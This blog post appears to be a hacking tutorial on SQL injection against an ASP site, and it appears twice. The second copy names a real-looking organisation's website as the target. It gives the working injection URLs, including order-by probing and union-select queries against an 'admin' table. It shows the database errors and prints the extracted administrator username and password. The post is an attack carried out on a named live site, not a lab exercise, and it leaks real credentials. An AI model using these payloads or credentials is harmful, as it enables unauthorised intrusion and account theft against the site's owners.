MSSQL(asp) injection
so lets start i got this one
here is the vulnerable page of site
so .. we can check vulnerability by using this ' sign like simple sql injection .
if our site is vulnerable we will get error like this
ok now we got the error means site is vul .. lets move to next point , now we need to find column numbers to get em we will do same like simple sql injection but we in this we will use # instead of -- at the end of out query .
so now our URL will look like
keep on trying this order by command till we get error like
i got error on 16 it means site have 15 colums . voila
so now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7,8,9, ......,15
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . in my site i got table name admin so m going to use it now . now our url will look like
after this we will get number of largest visible colum which we can use to get data from site . here i got 3,7and 6
so now we are going to use 3 to get information now all we have to do is just put the name of colum instead of 3 in string and we will get username and password ,
now our url will look like
and done we got the username here
username is
and then change colum name with passwords colum name
you will get the password ;)here we got the password that is
hopes it will help u , in this type of injection we dont get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for CT , enjoy !!
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
http://www.fpcci.com.pk
here is the vulnerable page of site
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985
so .. we can check vulnerability by using this ' sign like simple sql injection .
if our site is vulnerable we will get error like this
Quote
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ct.cattypeid=nc.cattypeid AND nc.catid=n.catid AND n.newsid=985';'.
/news1/includes/common.asp, line 75
Syntax error in string in query expression 'ct.cattypeid=nc.cattypeid AND nc.catid=n.catid AND n.newsid=985';'.
/news1/includes/common.asp, line 75
ok now we got the error means site is vul .. lets move to next point , now we need to find column numbers to get em we will do same like simple sql injection but we in this we will use # instead of -- at the end of out query .
so now our URL will look like
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 order by 1#
keep on trying this order by command till we get error like
Quote
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '16' as a valid field name or expression.
/news1/includes/common.asp, line 75
The Microsoft Jet database engine does not recognize '16' as a valid field name or expression.
/news1/includes/common.asp, line 75
i got error on 16 it means site have 15 colums . voila
so now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7,8,9, ......,15
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . in my site i got table name admin so m going to use it now . now our url will look like
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin#
after this we will get number of largest visible colum which we can use to get data from site . here i got 3,7and 6
so now we are going to use 3 to get information now all we have to do is just put the name of colum instead of 3 in string and we will get username and password ,
now our url will look like
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,name,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
and done we got the username here
username is
farrukhand then change colum name with passwords colum name
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
you will get the password ;)here we got the password that is
fpcci#f
hopes it will help u , in this type of injection we dont get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for CT , enjoy !!
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
Comments
Post a Comment